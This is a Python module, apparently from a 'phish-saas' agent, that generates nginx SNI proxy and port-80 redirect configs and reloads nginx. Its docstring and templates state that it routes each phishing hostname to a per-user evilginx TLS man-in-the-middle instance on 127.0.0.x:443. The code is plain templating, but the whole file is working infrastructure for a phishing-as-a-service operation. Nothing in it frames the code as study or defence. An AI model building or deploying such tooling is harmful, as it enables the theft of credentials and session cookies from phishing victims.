"""Generate the nginx TCP SNI proxy config that routes each phishing
hostname to its per-user evilginx instance on 127.0.0.x:443.

Public :443 (nginx stream) -> SNI lookup -> 127.0.0.x:443 evilginx (TLS MITM).
Public :80 (nginx http)    -> 301 redirect / ACME.
"""
import logging
import subprocess
from pathlib import Path

logger = logging.getLogger("agent.nginx")

SNI_TEMPLATE = """# Generated by phish-saas agent. DO NOT EDIT MANUALLY.
# Regenerated on every instance provision/teardown.

map $ssl_server_name $evg_backend {{
{entries}
    default  off;
}}

map $ssl_server_name $evg_sni {{
{snips}
    default  $ssl_server_name;
}}

server {{
    listen {listen_addr}:443;
    proxy_pass $evg_backend;
    proxy_connect_timeout 5s;
}}
"""

HTTP_TEMPLATE = """# Generated by phish-saas agent. DO NOT EDIT MANUALLY.
# Port 80: redirect everything to https; serve ACME challenges.
server {{
    listen {listen_addr}:80 default_server;
    server_name _;
    location /.well-known/acme-challenge/ {{
        root /var/www/acme;
    }}
    location / {{
        return 301 https://$host$request_uri;
    }}
}}
"""


def render_sni(instances: dict[str, dict], external_ip: str = "0.0.0.0") -> str:
    entries = []
    snips = []
    for hostname, meta in sorted(instances.items()):
        entries.append(f"    {hostname}    {meta['loopback_ip']}:443;")
        entries.append(f"    *.{hostname}    {meta['loopback_ip']}:443;")
        snips.append(f"    {hostname}    {meta['loopback_ip']};")
    listen_addr = external_ip if external_ip and external_ip != "0.0.0.0" else "0.0.0.0"
    return SNI_TEMPLATE.format(
        listen_addr=listen_addr,
        entries="\n".join(entries) or "    default off;",
        snips="\n".join(snips) or "",
    )


def render_http(external_ip: str = "0.0.0.0") -> str:
    listen_addr = external_ip if external_ip and external_ip != "0.0.0.0" else "0.0.0.0"
    return HTTP_TEMPLATE.format(listen_addr=listen_addr)


def apply(sni_conf: str, http_conf: str, conf_path: Path, apply: bool) -> str:
    conf_path.parent.mkdir(parents=True, exist_ok=True)
    conf_path.write_text(sni_conf)
    if apply:
        r = subprocess.run(["nginx", "-t"], capture_output=True, text=True)
        if r.returncode != 0:
            raise RuntimeError(f"nginx -t failed: {r.stderr[-500:]}")
        subprocess.run(["nginx", "-s", "reload"], check=True)
        logger.info("nginx config applied + reloaded: %s", conf_path)
    else:
        logger.info("[dry-run] wrote nginx snippet to %s (not applied)", conf_path)
    return str(conf_path)